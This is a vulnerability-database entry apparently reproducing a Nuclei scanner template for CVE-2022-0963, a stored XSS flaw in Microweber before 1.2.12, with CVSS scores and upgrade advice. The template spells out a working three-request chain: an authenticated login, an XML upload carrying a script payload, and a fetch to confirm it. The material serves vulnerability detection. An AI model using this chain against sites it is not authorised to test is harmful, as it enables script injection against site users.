Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2022-0963
HistoryJul 23, 2022 - 6:16 p.m.

Microweber <1.2.12 - Stored Cross-Site Scripting

2022-07-2318:16:12
ProjectDiscovery
github.com
2

5.4 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

3.5 Low

CVSS2

Access Vector

NETWORK

Access Complexity

MEDIUM

Authentication

SINGLE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:S/C:N/I:P/A:N

0.001 Low

EPSS

Percentile

49.9%

Microweber prior to 1.2.12 contains a stored cross-site scripting vulnerability. It allows unrestricted upload of XML files,.
id: CVE-2022-0963

info:
  name: Microweber <1.2.12 - Stored Cross-Site Scripting
  author: amit-jd
  severity: medium
  description: |
    Microweber prior to 1.2.12 contains a stored cross-site scripting vulnerability. It allows unrestricted upload of XML files,.
  remediation: |
    Upgrade Microweber CMS to version 1.2.12 or later to mitigate the vulnerability.
  reference:
    - https://huntr.dev/bounties/a89a4198-0880-4aa2-8439-a463f39f244c/
    - https://github.com/advisories/GHSA-q3x2-jvp3-wj78
    - https://huntr.dev/bounties/a89a4198-0880-4aa2-8439-a463f39f244c
    - https://nvd.nist.gov/vuln/detail/CVE-2022-0963
    - https://github.com/microweber/microweber/commit/975fc1d6d3fba598ee550849ceb81af23ce72e08
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 5.4
    cve-id: CVE-2022-0963
    cwe-id: CWE-79
    epss-score: 0.00144
    epss-percentile: 0.50156
    cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: microweber
    product: microweber
  tags: cve,cve2022,xss,microweber,cms,authenticated,huntr,intrusive

http:
  - raw:
      - |
        POST /api/user_login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        username={{username}}&password={{password}}
      - |
        POST /plupload HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=---------------------------59866212126262636974202255034
        Referer: {{BaseURL}}admin/view:modules/load_module:files

        -----------------------------59866212126262636974202255034
        Content-Disposition: form-data; name="name"

        {{randstr}}.xml
        -----------------------------59866212126262636974202255034
        Content-Disposition: form-data; name="chunk"

        0
        -----------------------------59866212126262636974202255034
        Content-Disposition: form-data; name="chunks"

        1
        -----------------------------59866212126262636974202255034
        Content-Disposition: form-data; name="file"; filename="blob"
        Content-Type: application/octet-stream

        <x:script xmlns:x="http://www.w3.org/1999/xhtml">alert(document.domain)</x:script>
        -----------------------------59866212126262636974202255034--
      - |
        GET /userfiles/media/default/{{to_lower("{{randstr}}")}}.xml HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body_3,"alert(document.domain)")'
          - 'status_code_3==200'
          - 'contains(body_2,"bytes_uploaded")'
        condition: and
# digest: 4a0a0047304502204c9a4e25aee3216da25fd050f68cf7c0e5b0a4e65532f9f62d4b83f5058333e2022100dda270d1c7edbe6d34680d6f67ca827c790c9c53883fb2789a999d65b493962e:922c64590222798bb761d5b6d8e72950

5.4 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

3.5 Low

CVSS2

Access Vector

NETWORK

Access Complexity

MEDIUM

Authentication

SINGLE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:S/C:N/I:P/A:N

0.001 Low

EPSS

Percentile

49.9%

Related for NUCLEI:CVE-2022-0963